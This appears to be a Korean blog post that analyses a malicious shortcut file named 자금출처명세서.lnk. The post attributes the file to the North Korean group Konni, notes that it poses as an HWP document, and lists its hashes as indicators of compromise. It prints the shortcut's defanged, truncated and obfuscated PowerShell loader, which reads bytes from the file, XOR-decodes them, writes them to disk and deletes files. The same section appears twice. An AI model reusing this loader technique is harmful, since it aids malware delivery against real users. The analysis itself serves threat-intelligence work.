주적 북한 해킹 단체 코니(Konni)에서 제작한 악성코드-자금출처명세서.lnk(2025.5.28)
Contents
오늘은 우리의 주적인 북한 해킹 단체 코니(Konni)에서 제작한 악성코드인 자금출처명세서·lnk(2025.5.28)에 대해 알아보겠습니다.
파일명:자금출처명세서.lnk
사이즈:1 MB
MD5:ba708acd2ea044fd8076dfd1bb540e77
SHA-1:066ef37379b12dcd9e1524b936d65c0f4cca9a4a
SHA-256:d5b59f06c2505cb28d1e7e52138b40ee5af7c1fc22a1b882e026fb187dd91be5
일단 해당 악성코드는 자금출처명세서로 돼 있으며 기본적으로 HWP 한글과 컴퓨터 문서로 위장하는 것이 특징입니다.
악성코드 포함된 Powershell 코드
StringData
{
namestring: hwp File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\WindowsPowershell\*(.)exe ^| finds
tr /i rshell(.)exe') do (if e(x)ist "%f" (%f "function jail{param($c?ear); <#bli?d born#>${*`
`} = $clear.substring(0,$clear.length-4) + ''; <#allow elect#>return ${*``};};function examin
ation{param($desert); r''em(o)''v(e)''-(i)t''em $d(e)sert -Force;};function wall{param($tongue,
$love,$me(d)ication,$otherwise,$pitch);<#w(r)iting off#> ${#. ]-}=Ne''w-''O''b''jec''t System
.IO.FileStream(<#resistance refer#>$tongue,<#pressure respo(n)sible#>[System.IO.FileMode]::O
pen,<#frustration championship#>[System.IO.FileAccess]::Read);<#highlight animal#> ${#. ]-}.
Seek(<#six ancient#>$love(,)[Sy(s)tem.IO.SeekOrigin]::Begin);<#hall formation#> ${[-}=$medic
ation*0x01;<#thank vote#> ${;~(}=Ne''w-O''bje''ct byte[] <#establish w(h)atever#>$medication
; <#wine political#> ${*#}=Ne''w''-O''b(j)e''ct byte[] <#book researcher#>${[-}; <#leading r
oll#>${#. ]-}.Read(<#clear after(#)>${*#},0,<#call deserve#>${[-}); ${#. ]-}.Close();${(~(#]
}=0;w(h)ile(${(~(#]} -lt $medication){<#directly provider#>${;~(}[${(~((#)]}]=${*#}[${(~(#]}
*0x01] -bxor $otherwise;${(~(#]}++;}<#me(m)ber possibly#> set''-co''nte''nt $pitch <#athleti
c certain#> ${;~(} -Enc(o)ding <#up loss#> Byte;};function tape{${(][} = $env:public<#flame
e(f)ficient#> + '\' (+)<#want concert#> 'do'+'cum'+'en'+'ts';<#s(a)nction symbol#> r(e)turn
${(][};};function flat{param($style); <#speaker widely#>${]@} = S''(p)li''(t)''-Pa''th $styl
e;<#siste(r) spiritual#> return ${]@};};f(u)nction be{param($Arab, $consider); ${``);*} = 'e
xpa'+'nd'; &${``);*} $Arab -F:* $consider;};function pride{r(e)turn G''et-''L''oc''ati''o''
n;};function plus{<#shelter civilian#>return $env:Temp;};function dig{${;} = …
파일명:자금출처명세서.lnk
사이즈:1 MB
MD5:ba708acd2ea044fd8076dfd1bb540e77
SHA-1:066ef37379b12dcd9e1524b936d65c0f4cca9a4a
SHA-256:d5b59f06c2505cb28d1e7e52138b40ee5af7c1fc22a1b882e026fb187dd91be5
일단 해당 악성코드는 자금출처명세서로 돼 있으며 기본적으로 HWP 한글과 컴퓨터 문서로 위장하는 것이 특징입니다.
악성코드 포함된 Powershell 코드
StringData
{
namestring: hwp File
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %f in ('dir /s /b %systemroot%\System32\WindowsPowershell\*(.)exe ^| finds
tr /i rshell(.)exe') do (if e(x)ist "%f" (%f "function jail{param($c?ear); <#bli?d born#>${*`
`} = $clear.substring(0,$clear.length-4) + ''; <#allow elect#>return ${*``};};function examin
ation{param($desert); r''em(o)''v(e)''-(i)t''em $d(e)sert -Force;};function wall{param($tongue,
$love,$me(d)ication,$otherwise,$pitch);<#w(r)iting off#> ${#. ]-}=Ne''w-''O''b''jec''t System
.IO.FileStream(<#resistance refer#>$tongue,<#pressure respo(n)sible#>[System.IO.FileMode]::O
pen,<#frustration championship#>[System.IO.FileAccess]::Read);<#highlight animal#> ${#. ]-}.
Seek(<#six ancient#>$love(,)[Sy(s)tem.IO.SeekOrigin]::Begin);<#hall formation#> ${[-}=$medic
ation*0x01;<#thank vote#> ${;~(}=Ne''w-O''bje''ct byte[] <#establish w(h)atever#>$medication
; <#wine political#> ${*#}=Ne''w''-O''b(j)e''ct byte[] <#book researcher#>${[-}; <#leading r
oll#>${#. ]-}.Read(<#clear after(#)>${*#},0,<#call deserve#>${[-}); ${#. ]-}.Close();${(~(#]
}=0;w(h)ile(${(~(#]} -lt $medication){<#directly provider#>${;~(}[${(~((#)]}]=${*#}[${(~(#]}
*0x01] -bxor $otherwise;${(~(#]}++;}<#me(m)ber possibly#> set''-co''nte''nt $pitch <#athleti
c certain#> ${;~(} -Enc(o)ding <#up loss#> Byte;};function tape{${(][} = $env:public<#flame
e(f)ficient#> + '\' (+)<#want concert#> 'do'+'cum'+'en'+'ts';<#s(a)nction symbol#> r(e)turn
${(][};};function flat{param($style); <#speaker widely#>${]@} = S''(p)li''(t)''-Pa''th $styl
e;<#siste(r) spiritual#> return ${]@};};f(u)nction be{param($Arab, $consider); ${``);*} = 'e
xpa'+'nd'; &${``);*} $Arab -F:* $consider;};function pride{r(e)turn G''et-''L''oc''ati''o''
n;};function plus{<#shelter civilian#>return $env:Temp;};function dig{${;} = …
IoC
ba708acd2ea044fd8076dfd1bb540e77
066ef37379b12dcd9e1524b936d65c0f4cca9a4a
d5b59f06c2505cb28d1e7e52138b40ee5af7c1fc22a1b882e026fb187dd91be5
066ef37379b12dcd9e1524b936d65c0f4cca9a4a
d5b59f06c2505cb28d1e7e52138b40ee5af7c1fc22a1b882e026fb187dd91be5